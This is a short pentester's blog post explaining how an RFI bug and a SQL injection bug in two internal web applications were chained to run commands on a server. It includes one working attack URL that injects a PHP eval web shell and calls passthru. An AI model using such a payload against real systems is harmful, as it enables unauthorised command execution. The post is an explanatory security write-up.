Pages

Tuesday, January 12, 2010

RFI over SQL Injection/Cross-Site Scripting

An amusing attack was demonstrated in the course of the last penetration testing. It is a good example of practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection per se didn’t allow us to exploit any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization!). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented:

http://<application_vulnerable_to_RFI>/?param=http://<application_vulnerable_to_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');

That is, each of these tree vulnerabilities taken separately was useless. Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server :)



All in all, there is nothing supernatural here, but I found this attack to be rather amusing...

2 comments:

  1. Chaining these kind of attacks gives an unlimited variation about how to attack enterprise networks.

    here is another interesting one:
    https://www.wechall.net/challenge/Z/CCCP/index.php

    In this attack the attacker can extract a whole database if he/she has no direct access to it...

    ReplyDelete
  2. Informative article. I am impressed with the unique writing style. Thanks for sharing it here :)

    PhD thesis writing

    ReplyDelete